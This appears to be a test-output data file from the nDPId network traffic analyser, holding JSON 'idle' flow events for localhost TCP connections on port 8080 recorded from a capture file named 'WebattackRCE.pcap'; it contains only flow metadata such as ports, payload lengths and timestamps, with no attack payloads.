+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277239,"flow_last_seen":1576420277239,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50256,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277240,"flow_last_seen":1576420277240,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50258,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277242,"flow_last_seen":1576420277242,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50260,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277243,"flow_last_seen":1576420277243,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50262,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277244,"flow_last_seen":1576420277244,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50264,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277246,"flow_last_seen":1576420277246,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50266,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277247,"flow_last_seen":1576420277247,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50268,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277248,"flow_last_seen":1576420277248,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50270,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277249,"flow_last_seen":1576420277249,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50272,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277252,"flow_last_seen":1576420277252,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50274,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277253,"flow_last_seen":1576420277253,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50276,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277255,"flow_last_seen":1576420277255,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50278,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277258,"flow_last_seen":1576420277258,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50280,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277260,"flow_last_seen":1576420277260,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50282,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277261,"flow_last_seen":1576420277261,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50284,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277263,"flow_last_seen":1576420277263,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50286,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277264,"flow_last_seen":1576420277264,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50288,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277266,"flow_last_seen":1576420277266,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50290,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277268,"flow_last_seen":1576420277268,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50292,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277269,"flow_last_seen":1576420277269,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50294,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277270,"flow_last_seen":1576420277270,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50296,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":377,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277272,"flow_last_seen":1576420277272,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50298,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":378,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277274,"flow_last_seen":1576420277274,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50300,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277276,"flow_last_seen":1576420277276,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50302,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277277,"flow_last_seen":1576420277277,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50304,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":381,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277278,"flow_last_seen":1576420277278,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50306,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":382,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277279,"flow_last_seen":1576420277279,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50308,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277281,"flow_last_seen":1576420277281,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50310,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":384,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277282,"flow_last_seen":1576420277282,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50312,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277283,"flow_last_seen":1576420277283,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50314,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":386,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277284,"flow_last_seen":1576420277284,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50316,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":387,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277286,"flow_last_seen":1576420277286,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50318,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":388,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277288,"flow_last_seen":1576420277288,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50320,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277291,"flow_last_seen":1576420277291,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50322,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":390,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277292,"flow_last_seen":1576420277292,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50324,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277293,"flow_last_seen":1576420277293,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50326,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277295,"flow_last_seen":1576420277295,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50328,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277296,"flow_last_seen":1576420277296,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50330,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277298,"flow_last_seen":1576420277298,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50332,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277299,"flow_last_seen":1576420277299,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50334,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277301,"flow_last_seen":1576420277301,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50336,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 